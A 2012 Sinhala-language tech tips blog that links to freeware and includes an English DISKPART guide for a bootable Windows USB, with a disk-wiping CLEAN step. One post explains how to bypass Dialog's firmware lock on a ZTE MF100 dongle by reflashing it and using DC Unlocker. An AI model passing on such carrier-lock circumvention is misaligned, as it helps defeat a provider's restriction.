-moz-user-select:none; -webkit-user-select:none; -khtml-user-select:none; -ms-user-select:none; user-select:none;

තවත් එක් හීනයක්

පිපෙන්නට වෙරදරන සහිනයට ඉඩ දෙන්න

දන්න දේ තේරෙන ලෙස ඔබ වෙතට දෙන තවත් එක් සහිනයක්

Pen එකකින් Computer එකක් Format කරමු

ඔයාල ඔක්කොමල වගේ කොම්පියුටර් කෑල්ලක් ‍‍‍ෆෝමැට් කරන්න දන්නවනේ නේද?

අපේ Drivers (ඩ්‍රයිවර්ස්) අපිම දා ගමු

ෆෝමැට් කරල ඉවර උනාම සද්ද බද්ද රූප නැති වෙනකොට තමයි උස්සල පොළවෙ ගහන්න හිතෙන්නෙ. මොනව කරන්නද ඒත්. අමාරුවෙන් ගත්ත කොම්පියුටර් කෑල්ල පොළවෙ ගහන්නය නේද?

තමන්ටම කියල QR code එකක් හදාගමු

ඇත්තටම මේ QR code එකෙන් මොකක්ද වෙන්නේ. QR code කියන එකේ තේරැම මොකක්ද? Quick Response Code (ක්ෂණික ප්‍රතිචාර කේතය). ඇත්තට මේකෙන් වෙන්නේ වැඩි දත්ත සංඛ්‍යාවක් මේ තුල ගබඩා කරගැනීමේ හැකියාවයි.

Monday, December 31, 2012

සාමය සතුට පිරි සුභ නව වසරක් වේවා... සිහිනයෙන් ප්‍රර්ථනා




2013 අලුත් අවුරුද්ද 
සිහිනයේ සියලුම සොහොයුරු සොහොයුරියන්ටත්, 
ඔවුන්ගේ පවුලේ සෑම දෙනාටමත්,
හිතේ තියෙන පැතුම් ඉටු වන
දුක් කරදර වලින් තොර....
කිරියෙන් පැණියෙන් ඉතිරෙන....
සාමය, සතුට, සෞභාග්‍ය සපිරි....
සුභම සුභ අලුත් අවුරුද්දක් වේවා....!!
AnjulA MadusankA

Desktop එකත් ඔයාලගේ කාමරේ වගේද? එහෙනම් පිළිවෙලකට තියමු



                ඔන්න යාළුවනේ අදත් මම ආව. අදත් පොඩි දෙයක් ගෙනාව දීල යන්න. මේක සමහර අයනම් දන්නේ නෑ. ඒත් Windows 7 බාවිතා කරන ගොඩක් අය දන්නව. කොටින්ම කිවුවොත් මේක දාන්න පුළුවන්නේ Windows 7 වලට විතරයි. මේකෙන් කෙරෙන ප්‍රධානම දේ තමයි අපේ  Desktop එක ටිකක් පිළිවෙල කරල දෙන එක. ඇත්තටම මේක දාපුවාම පොඩි ගතියකුත් තියනව. ඉතින් කියන්න තියෙන්නෙනම් එච්චරයි. පොඩි දෙයක්නේ ඒකයි පොඩිවට ලිවුවේ. එහනම් දාගෙන බලන්නකො. හොදයිනම් කමෙන් එකකුත් දාලම යන්න කියල ආරාධනා කරනව. එහෙනම් ගියා ඉතින්.

සිහිනයට පිවිසෙන්න





Saturday, December 29, 2012

ඕන වචනයක් ඉක්මනට හොයාගන්න



                          කොහොමද යාවනේ ඔන්න මම අදත් ආව පොඩි දෙයක් අරගෙන. මේකනම් ලොකු දෙයක් නෙවෙයි. මේක පොඩි Dictionary එකක් ගැන. ගොඩක් අය මේක ගැන දන්නවනම් ඇති. නොදන්න අයටත් දැන ගන්න කියන්නම්කෝ. මේකෙ නම තමයි. දෙරණ Dictionary.

                         මේකෙ තියෙන විශේෂම දේ තමයි. අපි සාමාන්‍යයෙන් භාවිතා කරන සිංහල ෆොන්ට් වලට අදාල කීස් යොදා ගැනීම. ඒ වගේම මේ දෙරණ Dictionary එකේ සිංහල වචනවල ගොඩාක් තේරුම් දීල තියෙනව. හරි එහෙනම් දාගෙන් බලන්නකො

සිහිනයට පිවිසෙන්න




Friday, December 28, 2012

හිතේ හැටියට MP3 කපමු.

                       කොහොමද යාළුවනේ ඔන්න අදත් ආව. මේ දැන්නම් සිහිනය ටිකක් ලස්සනයි නේද? ම්ම්ම්... ගොඩක් මහන්සි උනා මේ තත්වෙට හදාගන්න. මොකද මං මේ ගැන කිසිම ක්ලාස් 1‍ට ගිහින් නෑනේ. ටික දෙනෙකුගෙන් උදව් ඉල්ලුව ඒත් කවුරුවත් උදව් කලේ නෑ. එක්කෙනෙක් පොඩි හෙල්ප් එකක් දුන්න එයාවත් මතක් කරනව.

                       හරි මම අද ගෙනාවෙනම් පොඩි දෙයක්. ඇත්තටම මේක mp3 කටර් එකක්. මේකෙන් වැඩ කරන්න ගොඩක් ලේසියි. මමත් ඔය එක එක ඒව කපන්න කොටන්න ගන්න මේක. දාගෙන බලන්නකෝ හොදයිද කියල. මටනම් එල.

                       ඒ වගේම යාළුවනේ මං දන්නව මේ සිහිනයත් එක්ක හැමදාම ඉන්න පිරිසක් ඉන්ව කියල. ඒ අයගෙන් මම ඉල්ලනව තමන්ගේ යාළුවොත් මේ සිහිනයට එකතු කරල දෙන්න කියල. ලොකු උදව්වක්. එහෙනම් අදට යන්නම්. පහල සිහිනයෙන් mp3 කටර් එක බාගන්න.

සිහිනයට පිවිසෙන්න


Thursday, December 20, 2012

මීයා නැති වෙලාවට හදිස්සියට ගන්න


                        ඔන්න යාළුවනේ මම අදත් ආව. අද මට පොඩි දෙයක් හම්බවුනා. මට හම්බවුනා කියන්නේ ඒක ඔයාලටත් දෙනව කියල දන්නවනේ නේද? හරි අපි එහෙනම් කෙලින්ම වැඩේට බහිමුකෝ.

                     ඔයාලගෙ කොම්පියුටර් කෑල්ලෙක් මීයෙක් ඉන්නව නේද? අනිවාරයෙන්ම ඉන්නවනේ. මීයා මොකාද කියල දන්නවනේ නේද? හරි බැරි වෙලාවත් ඔය මීයා නැති උනොත් ඒ කිවුවේ හදිස්සියෙවත් කැඩුනොත්. එහෙමත් නැත්තම් අර අලුතින් එන නැට්ට නැති මීයන්ගේ (වයර්ලස්) බැටරි බැස්සොත් මොකද කරන්නේ. එන්න ඒ වෙලාවට අපේ කී බෝඩ් එක මීයෙක් වෙනුවට පාවිච්චි කරන්න පුලුවන් සොෆ්ට්වෙයාර් කෑල්ලක්   තමයි මේ. ඉතින් ගොඩක් වටිනව නේ. හරි එහෙනම් පහල සිහිනයට ගිහින් බා ගන්නකෝ.එහෙනම් ඕන් ගියා...

සිහිනයට පිවිසෙන්න...


යන්න කලින් කොමන්ට් පාරක් දාගන්න.

Saturday, December 15, 2012

අපේ Drivers (ඩ්‍රයිවර්ස්) අපිම දා ගමු



                           


                      කොහොමද යාළුවනේ ඔන්න ඉතින් ගොඩක් දවසකින් අදත් ආව ගොඩාක් වටින දෙයක් අරගෙන. ඇත්තටම මේක මටනම් ගොඩක් වටිනව. මේක ඇවිල්ල මේ ඩ්‍රයිවස් සොෆ්ට්වෙයාර් කෑල්ලක්. ඔයාල ඔක්කොමල වගේ තම තමන්ගෙ කොම්පියුටර් කෑල්ල ෆෝමැට් කරගන්න දන්නවනේ නේද? ඕකත් දෙයක්ද නේද? කජු කනව වගේ වැඩක් නේ.
                    
                       ඒ උනාට ෆෝමැට් කරල ඉවර උනාම සද්ද බද්ද රූප නැති වෙනකොට තමයි උස්සල පොළවෙ ගහන්න හිතෙන්නෙ. මොනව කරන්නද ඒත්. අමාරුවෙන් ගත්ත කොම්පියුටර් කෑල්ල පොළවෙ ගහන්නය නේද? මමත් නිකන් පිස්සු කියවනව නේද? හරි එහෙම සද්ද බද්ද රූප නැති උනා කියමුකො. ඔයා මොකද කරන්නේ. දන්න වැඩර් කෙනෙකුට කතා කරනවද? වැඩර්ට කතා කරා කියල මොකෝ වැඩර් ගාව දාන්න ඩ්‍රයිවර්ස් තියනවය නේ. නැත්තම් ඉතින් අලුතින් ගත්ත මොනර කොලයකුත් අරන් ලගම තියෙන කොම්පියුටර් කඩේට තමයි කොම්පියුටර් එක උස්සගෙන දුවන්න වෙන්නේ. අපරාදෙ සල්ලි. වෙන මොනව කරන්නද?
                     අන්න ඒ වගේ වෙලාවට පිහිටට ගන්න පොඩි සොෆ්ට්වෙයාර් කෑල්ලක් තමයි අද දෙන්න යන්නේ. හරියට නියට දෙවිකෙනෙක් වගේ නේ. මේකෙ නම තමයි Slim Drivers (ස්ලිම් ඩ්‍රයිවර්ස්). මේකෙත් එක්ක වැඩ කරන්න තව පොඩි ගැජට් කෑල්ලක් ඕන වෙනව. ඒ තමයි ඩොන්ගල් කෑල්ලක්. මන් දන්න තරමින්නම් ඩොන්ගල් කෑල්ලක් නැති කෙනෙක් නැති තරම්. නැතිම කෙනෙක් ඉන්නවනම් ටක් ගාල අල්ලපු ගෙදරට දුවල ගිහින් අරන් එන්නකෝ. දැන් හරි නේ.එහෙනම් පටාන් ගමු.
                 

                     ඔයාල Slim Drivers (ස්ලිම් ඩ්‍රයිවර්ස්) සොෆ්ට්වෙයාර් කෑල්ල ඩවුන්ලෝඩ් කලාට පස්සේ ඒක Open කලාම ලැබෙන තිරය තමයි ඔය උඩින් තියෙන්නේ. මෙම තිරය මගින් තමන්ගේ කොම්පියුටර් කෑල්ලේ සියලු විස්තර පෙන්නනවා. තේරුනානේ නේද? මම ඔයාලට තව මේකෙ වැඩ කෑලි ටිකක් කියල දෙන්නම්. හරි මුලින්ම Slim Drivers වින්ඩෝ එක තුළ  ඉහලින් ඇති Option නම් බොත්තම ඔබන්නකෝ. හිමින් ඔබන්න හොදේ. එතන තියෙන General ටැබ් එක ඔබන්නකෝ.

#. Automatically Select all items after scanning - මෙය තෝරා ඇතිවිට ඩ්‍රයිවර්ස් සොෆ්ට්වෙයාර් ඉන්ස්ටෝල්
                                                                         කිරීමෙන් පසුව අප්ඩේට් කළ යුතු ඒවා සියල්ල ඉබේ
                                                                         සිලෙක්ට් වී පෙන්වයි.

#. Run at Windows startup - මෙය තෝරා ඇතිවිට වින්ඩෝස් මෙහෙයුම් පද්දතියට පිවිසෙන විටම Slim
                                            Drivers (ස්ලිම් ඩ්‍රයිවර්ස්) වැඩසටහනද ක්‍රියාත්මක වෙයි.

#. Check Slim Drivers Update Automatic cally - මෙය තෝරා ඇතිවිට ස්ලිම් ඩ්‍රයිවර්ස් වැඩසටහනේ අලුත්
                                                                            සංස්කරණ තිබේද කියා නිතර සොයා බලයි.

                             Slim Drivers (ස්ලිම් ඩ්‍රයිවර්ස්) සොෆ්ට්වෙයාර් කෑල්ල ගැන ඔයාල යම් අවබෝධයක් ගන්න ඇති කියල මම හිතනව. හරි. Slim Drivers (ස්ලිම් ඩ්‍රයිවර්ස්) සොෆ්ට්වෙයාර් කෑල්ල ඇතුලෙ තියෙන Start Scan බොත්තම තද කලාම තමන්ගේ කොම්පියුටර් කෑල්ලේ තියෙන අඩු පාඩු ඩ්‍රයිවර්ස්. ඒ කිවුවෙ අඩු සද්ද බද්ද රූප වල ඩ්‍රයිවර්ස් ෆයිල් පෙන්නුම් කරනවා. ඒ පෙන්නුම් කිරීම් ඉදිරියෙන් ඇති Download Update නම් බොත්තම ඔබපුවාම ඩ්‍රයිවර්ස් ඩවුන්ලෝඩ් වෙනව. එතනින් එහාට කියල දෙනන් ඕන නෑනේ නේද? අම්මෝ අදනම් දිග ලියුමක් ලිවුව. දැන්නම් හොදටම මහන්සියි. එහෙනම් අදට යන්නම්. මේ සොෆ්ට්වෙයාර් කෑල්ල පහල සිහිනයට ගහින් බා ගන්නකෝ. තවත් සිහිනයකින් හමුවන බලාපොරොත්තුවෙන් ඔන්න මම ගියා.

සිහිනයට පිවිසෙන්න




Sunday, November 25, 2012

Pen එකකින් computer එක format කරමු.

                       
                        කොහොමද මගේ යාළුවෝ කස්ටියට. ඔන්න ගොඩක් දවසකට පස්සේ මම අදත් ආව. මම ඉතින් ආව කියන්නේ ඔයගොල්ලන්ට ගොඩක් වටින කියන දෙයක් අරගෙනනේ එන්නේ නේද? හරි අපි වැඩේට බහිමුකෝ. බැස්සට පස්සේ ගොඩ එන්න පුළුවන් වෙයිද දන්නෑ. මොකද අද ගෙනාපු වැඩේ ගොඩක් ලොකු එකක්. ඒ වගේම හරිම බර දෙයක්. අම්මෝ...... මාර බරක්. හැබැයි මාර වටිනවා ඈ.... ම්ම්ම්ම....

                       ඔයාල ඔක්කොමල වගේ කොම්පියුටර් කෑල්ලක් ‍‍‍ෆෝමැට් කරන්න දන්නවනේ නේද? හරි එහෙනම් දන්නැති අය අත උස්සන්න බලන්න. ආ.... ටික දෙනෙක් ඉන්නව නේද. අනිත් අය දන්නවනම් ඉතින මක් කොරන්නද නේ. හරි දන්න අයටයි නොදන්න අයටයි අළුත් දෙයක් කියල දෙන්නයි යන්නේ.

                       ඔයාල ගාව තියෙන කොම්පියුටර් මෙව්ව එක සීඩී දාන්න බැරි ලැප්ටොප් කියන එවුව එකක් හරි මේසෙ උඩ තියල තියෙන ලොකු මෙවුව එකේ සීඩී දාන අහවල් එක කැඩිලයි කියමුකෝ. ඉතින් මට මොකො නේ. හරි අන්න ඒ වෙලාවට ‍කොම්පියුටර් කෑල්ල ෆෝමැට් කරගන්න විදියක් තමයි මම කියල දෙන්නේ. මරු නේ. මරේ මරු. හරි ඒකට ඔයාලට අර පෙන් එකද මොකක්‍ද කියන එක්ක ඕන වෙනව. හැබැයි යාළුවනේ මේ විදියට ෆෝමැට් කරන්න පුළුවන්නේ windows 7 හා windows 8 විතරයි හොදේ. දැන් ඉතින් ගොඩක් අය වැඩ කරන්නේ windows 7 වලින්නේ. ඒක හින්ද අවුලක් නෑනේ.

එහෙනම් පල්ලෙහා තියෙන විදියට වැඩේ කරගෙන යන්න.


Advertisements
This guide works 100% for Windows 7 and Windows 8 unlike most of the guides out there. I have seen many sites/blogs that have “Install Vista from USB guide” but either with incomplete steps or not working guide. I have also seen some guides that don’t’ use proper commands in this guide. After spending many hours I have come up with this 100% working guide to install Windows 7 and Windows 8 from USB flash drive.


I just did this method on one of my friends machine and installed Windows 7 and Windows 8 . The main advantage is that by using USB drive you will be able to install Windows 7 or Windows 8 in just 15 minutes. You can also use this bootable USB drive on friend’s computer who doesn’t have a DVD optical drive.
The method is very simple and you can use without any hassles. Needless to say that your motherboard should support USB Boot feature to make use of the bootable USB drive.
Requirements:
*USB Flash Drive (Minimum 4GB)
*Windows 7 or Windows 8 installation files.
Follow the below steps to create bootable Windows 7/Windows 8 USB drive using which you can install Windows 7 or Windows 8 easily.
Procedure:
1. Plug-in your USB flash drive to USB port and move all the contents from USB drive to a safe location on your system.
2. Open Command Prompt with admin rights. Use any of the below methods to open Command Prompt with admin rights.
*Type cmd in Start menu search box and hit Ctrl+ Shift+ Enter.
Or
*Go to Start menu > All programs > Accessories, right click on Command Prompt and select Run as administrator.
3. You need to know about the USB drive a little bit. Type in the following commands in the command prompt:
First type DISKPART and hit enter to see the below message.


Next type LIST DISK command and note down the Disk number (ex: Disk 1) of your USB flash drive. In the below screenshot my Flash Drive Disk no is Disk 1.
4. Next type all the below commands one by one. Here I assume that your disk drive no is “Disk 1”.If you have Disk 2 as your USB flash drive then use Disk 2.Refer the above step to confirm it.
So below are the commands you need to type and execute one by one:
SELECT DISK 1
CLEAN
CREATE PARTITION PRIMARY
SELECT PARTITION 1
ACTIVE
FORMAT FS=NTFS
(Format process may take few seconds)
ASSIGN
EXIT
Don’t close the command prompt as we need to execute one more command at the next step. Just minimize it.


5. Next insert your Windows7/Windows 8 DVD into the optical drive and check the drive letter of the DVD drive. In this guide I will assume that your DVD drive letter is “D” and USB drive letter is “H” (open my computer to know about it).
6. Maximize the minimized Command Prompt in the 4th step.Type  the following command now:
D: CD BOOT and hit enter.Where “D” is your DVD drive letter.
CD BOOT and hit enter to see the below message.
7. Type another command given below to update the USB drive with BOOTMGR compatible code.
BOOTSECT.EXE /NT60 H:


Where “H” is your USB drive letter. Once you enter the above command you will see the below message.
8. Copy your Windows 7 or Windows 8 DVD contents to the USB flash drive.
9. Your USB drive is ready to boot and install Windows 7 or Windows 8. Only thing you need to change the boot priority at the BIOS to USB from the HDD or CD ROM drive. I won’t explain it as it’s just the matter the changing the boot priority or enabling the USB boot option in the BIOS.
Note: If you are not able to boot after following this guide means you haven’t set the BIOS priority to USB. If you got any problem in following this guide feel free to ask questions by leaving comment.
Update: If you find this guide difficult to follow, please use the easy-to-use guide to create a bootable USB to install Windows 7  or Windows 8 using official tool.

                     එහෙනම් යාළුවනේ ලොකු වැඩක් කියල දුන්නේ. ගොඩක් වටින දෙයක්. මේ ගත්ත උත්සාහය ඔයාල ‍කමෙන් එකකින් හරි අගේ කරයි කියල හිතනවා. තවත් සිහිනයකින් හමුවෙමු....

Thursday, November 8, 2012

මදි නොකියන්න නොමිලේ SMS. ලෝකේ ඕනම අස්සකට මුල්ලකට



                      ඔන්න යාළුවනේ මම අදත් මේ පැත්තට ඇවිත් යන්න ආව. ඔයාල දන්නවනේ ඉතින් මං මේ පැත්තට එනකොට ඔය මොනව මොනව හරි අරගෙනයි එන්නේ කියල නේ. ම්..... අදත් මට හම්බවුනා ගොඩක් වටින දෙයක්. කියල වැඩක් නෑ ඈ.

                      හරි ඔයාල දවසකට එස්.එම්.එස් කීයක් ගහනවද? එයාර්ටෙල් පාවිච්චිකරන අයනම් රු.25ට 500ක් ම ගහනවනේ නේද? මම දැන් දෙනන් හදන්නේ සම්පුර්ණයෙන්ම නොමිලේ මැසේජ් යවන්න පුලුවන් සයිට් එකක්. කොහොමද වැඩේ.මේකේ හොදම දේ තමයි ලෝකෙ ඕනම අස්සකට මුල්ලකට මැසේජ් යවන්න පුළුවන්. ලංකාවෙත් ඕනම ජාලයකට ඔට්ටුයිග මල ජංජාලයයි නේ. කොච්චර ගහුවත් නොමිලේ. කස්ටියට ගහල ගහල  එපාවෙයිද මන්ද. හික්ස්... කමක් නෑ ගහන්නකෝ... මේ ගැහුව වගේම මේකට කමෙන්ට් එකකුත් දාලම යන්න්.එහෙනම් ඔන්න මම ගියා....

සිහිනයට පිවිසෙන්න


Tuesday, October 30, 2012

Blog එකට ලස්සන ඔරලෝසුවක් දාගමු



                          ඉතින් කොහොමද යාළුවනේ ඔන්න මම ගොඩක් දවසකට පස්සේ ආවේ. වැඩ ගොඩක් තිබුන නිසා මොකවත් කරගන්න වෙලාවක් තිබුනේ නෑ. දන්නවනේ ඉතින් වැඩ කිවුවාම රටේ නැති දේවල් තියනවනේ කරන්න. හරි කමක් නෑ ඔන්න මම අදත් ඔයාලට දෙනන් පොඩි දෙයක් අරගෙන ආව. මේක ගොඩක්ම වටින්නේ. බ්ලොග් එකක් තියන කෙනෙකුට. මොකද මම අද දෙන්න හදන්නේ බ්ලොග් එකකට දාගන්න පුළුවන් ඔරලෝසු කිහිපයක් ගැනයි. මෙතන ඔරලෝසු වර්ග ගොඩාක් තියනව. කැමති එකක් තෝරගන්න පුළුවන්. සමහර අයටනම් බ්ලොග් එකක් නැතුව ඇති. කමක් නෑ ඒ අයත් බලන්නකෝ. මම ලගදිම බ්ලොග් එකක් හදාගන්නේ කොහොමද කියල කියල දෙන්නම්කෝ.

                       ආ මේ ඔරලොසුව ඔයාලගෙ බ්ලොග් එකට කොහොමද දා ගන්නේ කියල කියලදෙන්න ඕන නෑනේ නේද? අපේ අයියලාට ඕකත් දෙයක්ද නේ. බැරි කවුරුහරි ඉන්නවනම් කමෙන්ට් එකක් දාන්න කියල දෙන්නම්. එහෙනම් ගියා ඔන්න. තවත් සිහිනයකින් හමුවෙමු.

සිහිනයට පිවිසෙන්න


Monday, October 8, 2012

ගෙදර විදුලි බිල අපිම හදාගමු



                               කොහොමද යාළුවනේ ඔන්න මම අදත් ආව ඉතින්. හැබැයි අද ආවේ ටිකක් අමුතු දෙයක් අරගෙනයි. මේ ඒක නෙවෙයි මේ මාසෙ ඔයාල‍ගෙ විදුලි බිල කීයද? ඔයාල බලයි යකෝ මුට මොකටද ඕව නේ. හරි හරි සොරිවෙන්නකෝ. මම අද දෙන්න යන්නේ තමන්ගේ ගෙදර විදුලි බිල තමන්ටම දැනගන්න පුළුවන් විදියක් ගැන. තමාගේ කිවුවට ඕනනම් අල්ලපු ගෙවල් වලත් බලන්න පුළුවන්. මොකද මනු කියවන්න එන බුවා හොර කරනවද දන්නෑනේ නේද? අනේ එහෙමන්ම් කරන්නේ නරතිව ඇති. මන් ඔය නිකම් කිවුවේ හොදේ.

                              හරි මේක online දෙන සේවාවක්. වැඩේ කරගන්න හරිම ලේසියි. ඔන්න මම පින්තූරයකුත් දැම්ම බලා ගන්නකෝ.



                             ඔයාල පහත සිහිනයට ගිහින් තමන්ගේ මේ මාසෙ විදුලි බිල කීයද කියල බලාගන්නකෝ. වැඩේ හොදනම් කමෙන්ට් පාරක් දාලම යන්න. ඔන්න මම ගියා. තවත් සිහිනයකින් හමුවෙමු.

සිහිනයට පිවිසෙන්න


Monday, October 1, 2012

ZTE MF100 Dongle එක unlock කරමු.



                  සුභ දවසක් වේවා යාළුවනේ. ඔන්න මම අදත් ආව. ආව කිවුවට මම අද එන්න නෙවෙයි හිටියෙ. ඒත් කෙනෙක් නිසා එන්න වුනා. යාළුවෙක් පොඩි උදව්වක් ඉල්ලුවාම නොදී කොහොමද නේද? හැබැයි මේක ලොකු වැඩක්. ඇත්තටම මෙයා මගේ යාළුවෙක්නම් නෙවෙයි. නෑ කිවුවට නැත්තෙත් නෑ. මගේ යාළුවෙක්ගෙ යාළුවෙක්. එයාගේ dongle එකක් තියනවලු ZTE MF 100 කියන එකක්. ඒක දීල තියෙන්නේ dialog එකෙන්. ඉතින් මෙයාට මේක unlock කරගන්න ඕන කියල කිවුව. ඉතින් මමත් වැඩේ අතෑරියේ නෑ. කොහොම හරි හොයාගත්ත. හරි අපි බලමු කොහොමද වැඩේ කරගන්නෙ කියල.

                       ZTE MF 100 කියන ඩොංගල් එක dialog ආයතනයෙන් තමයි නිකුත් කරන්නේ. මීට කලින් lock කරල දීපු dongle අපේ අය unlock කරන නිසා dialog ආයතනය ඉන් ඉහාට ගහින් මේ කියන ZTE MF 100 ඩොංගල් එකට Firmware (ස්තීරාංග) එකක් දාල unlock කරගන්න බැරි විදියට දුන්න .හැබයි කලින් දීපු ඩොන්ගල් Firmware එක DC Unlocker එකෙන් Unlock කරගන්න පුලුවන්. ඉතින් මොකක් හරි සෙල්ලමක් දාලා පරණ Firmware එක අලුත් ඩොන්ගල් එකට දාගත්තා නම් Unlock කරගන්න පුලුවන් නේද?

                  දැන් වැ‍ඩේ තේරැනානේ....... අපේ අයියලාට මොන lock එකක් දැම්මත් එක අයින් කරන එක ඒ හැටි දෙයක් නෙවෙයිනේ නේද?ඉතින් අපි කරන්න යන්නේ මුලින්ම ඩොන්ගල් එකේ තියෙන Firmware එක Update කරගන්න එක.

එක මේ සිහිනයෙන් කරගන්න


එක කරගන්න තියෙන්නෙ මෙහෙමයි
සිම් එකක් නැතිව ඩොන්ගල් එක PC එකට Plug කරන්න..
දැන් මෙ යටින් තියෙන සිහිනයට ගිහින් ZTE Firmware Updater එක Download කරගන්න


මෙකෙන් ඩොන්ගල් එක Detect කරගත්තට පස්සේ >>> Start Update >>> කරන්න  සම්පුර්ණයෙන් ඉවර උනාට පස්සෙ වෙන සිම් පතක් යොදා DC Unlocker එක මගින් ඩොන්ගල් එක Unlock කරගන්න. දැන් වැ‍ඩේ හරි. මේකට ගොඩක් මහන්සි වුනා. මහන්සිය අගේ කරනවානම් ‍කමෙන්ට් එකක් ලයික් එකක් දාලම යන්න. එහෙනම් තවත් සිහිනයකින් හමුවෙමු.


Sunday, September 30, 2012

තමන්ටම කියල QR code එකක් හදාගමු

                          
                        කොහොමද කට්ටියට. ඔන්න මම අද ඔයාලට අලුත්ම දෙයක් ගෙනාව. සමහර අයටනම් මේක අලුත්ම අත්දැකීමක් වෙයි. සමහර අයනම් මේ ගැන දන්නවත් ඇති. ඔයාල මේක කලින් දැකල ඇති එත් මේක මොකක්ද කියල හරි හැටි විස්තරයක් දන්නේ නැතිව ඇති. මේක තමයි QR code. මේක ලෝකෙට හදුන්වලා දීල තියෙන්නේ  Toyota  සමාගම විසින් 1994 දී. මේක අද වන විට ලෝකයේ ගොඩාක් අය භාවිතා කරනවා.




                         ඇත්තටම මේ QR code එකෙන් මොකක්ද වෙන්නේ. QR code කියන එකේ තේරැම මොකක්ද? Quick Response Code (ක්ෂණික ප්‍රතිචාර කේතය). ඇත්තට මේකෙන් වෙන්නේ වැඩි දත්ත සංඛ්‍යාවක් මේ තුල ගබඩා කරගැනීමේ හැකියාවයි. ඒ වගේම මේ කේතය ඉතා ඉක්මනින් හා පහසුවෙන් කියවීමේ හැකියාවක්ද තියෙනවා. කියවනව කිවුවට අහෙන් බලල කියවන්න බෑ එකට වෙනම උපාංගයක් ඕන. දැන්නම් ජංගම දුරකතන වලින් කියවන්න පුළුවන්. ඒත් හැම එකකින්ම බෑ. Apple, Android, Windows වගේ අලුත්ම ඒවගෙන් පුළුවන්. එත් ඒකට සොෆ්ට්වෙයාර් එකක් ඕන. ඒකත් දෙන්නම්. 





                        QR code ගැන යම් තරමේ දැනුමක් ලැබුන නේද? ඔයාලටත් තමන්ගේම කියල QR code එකක් තියෙනවනම් කොහොමද. හරි මං දැන් කියල දෙනන්ම්කෝ කොහොමද හදාගන්නේ කියල. පහල සිහිනයට ගිහින් QR code එක හදාගන්නකෝ.


මෙතනින් ඔයාලගේ QR code එක හදාගන්න

                      දැන් ඔයාලටම කියල  QR code එකක් හදාගත්තනේ නේද? දැන් පහල සිහිනයට ගිහින් ඔයාගගේ දුරකතනයට ගැලපෙන සොෆ්ට්වෙයාර් එක භාගන්නකෝ. ඒකර ඹයාල බලන්නකෝ වැ‍ඩේ හොදද කියල. මේක තමයි අලුත්ම තාක්ශණය. තාක්ශණයත් එක්ක අපිත් දියුණු වෙන්න ඕනනේ. නැත්තම් වැඩක් නෑනේ නේද? ඔයාල යම් දෙයක් ඉගෙන ගත්තනම් මේ උත්සාහය ගැන මොනව හරි ලියලම යන්න.

මෙතනින් භාගන්න


Thursday, September 27, 2012

screen එකේ image එකක් ගමු



                           ඉතින් කොහොමද කස්ටියට. ඔන්න මම අදත් ආව. අද මම දෙන්න හදන්නේ සොෆ්ට්වෙයාර් එකක්නම් නෙවෙයි. පොඩි වැඩ කෑල්ලක්. ඔයාල දැකල ඇති සමහර තැන්වල Desktop එකේ ෆොටෝස් දාල තියනව. ඇත්තටම කොහොමද මේ image එක ගන්නේ. සමහර අයනම් දන්නවත් ඇති නේද? හරි නොදන්න අය අහගන්නකෝ....

                          ඔයාලගෙ computer එක මොකක් උනත් කමක් නෑ. මෙකක් උනත් කමක් නෑ කිවුවේ laptop, desktop හරිද. ම්ම්ම්... දැන් ඔයාලගේ keyboard එකේ බලන්න prt scrn (print screen) කියල key එකක් තියනවද කියල.


(සමහර  keyboard වල prt scrn (print screen) key එක එක එක තැන්වලයි තියෙන්නෙ හෙදේ)

                 හරි ඔයාලට ගන්න ඕන image එක Desktop එක කියල හිතමුකෝ. මේක කරන්න හරිම ලේසියි. ඔයාලට තියෙන්නේ prt scrn (print screen) key එක එක පාරක් ඔබන එකයි. හරි ඉතින් එබුවයි කියමුකෝ. කෝ image එක. ඔයාලගෙ image එක ගන්න ඕනනම් Microsoft Office Word එකේ හෝ Adobe Photoshop වගේ සොෆ්ට්වෙයාර් එකක් පාවිච්චි කරන්න ඕන. එකරල Microsoft Office Word එකේනම් right click කරල  paste කරාම වැඩේ හරි. Adobe Photoshop එකේනම් new window එකක් අරගෙන ඒක උඩ right click කරල  paste කරානම් වැඩේ හරියනව.

              ඉතින් දන්නෙ නැති අයට ගොඩක් වටි කියල හිතනව.මේ ගැන මේ වැඩේ හොදයිනම් මොනව හරි අදහසක් දාලම යන්න.  







Sunday, September 23, 2012

singreesi වලින් සිංහල ලියමු.

                     

                       කොහොමද යාළුවන්ට. ඔන්න මම අදත් ඔයාලට වටින කියන සොෆ්ට්වෙයාර් කෑල්ලක් ගෙනාව. මටනම් මේක ගොඩක් වටිනව. ඔයාලටත් ගොඩක් වටිනව කියල දන්නවා. මේක හදල තියෙන්නෙත් ලංකාවේ අපේ සිංහ පැටියෙක්. ආඩම්බරයි නේද?

                         මේකේ නම තමයි singreesi. ඒ කියන්නේ අපි ඔය sms ගහන්නේ. අන්න එහෙම  singreesi වලින් ගහපුවාම නිකම්ම ඒ වචන ටික සිංහල වලට හැරවෙනව. කොහොමද වැඩේ හොදයි නේද? තේරැනේ නැත්තම් පහල පින්තූරෙත් බලලම ඉන්නකෝ.

             
                         දැන් තේරැනා නේද? ඉතින් මේක ඔයාලට ගොඩක් වටිනව නේද? මෙකෙන් ඔයාලට ඕන දේ ලියාගෙන ඒ දේ copy කරගෙන තමන්ට ඕන තැනකට paste කරගන්න පුළුවන්. හරිම ලේසියි. ඉතින් මම හිතනව මේ උත්සාහය ගැන මොනව හරි ඔයාලගෙ අදහස් ලියල යයි කියල. එහෙනම් මම ගියා. පල්ලෙහා පින්තූරෙන් සොෆ්ට්වෙයාර් කෑල්ල ගන්න පුලුවන්.

සිහිනයට පිවිසෙන්න


Monday, September 17, 2012

Delete වුන file නැවත ගන්න



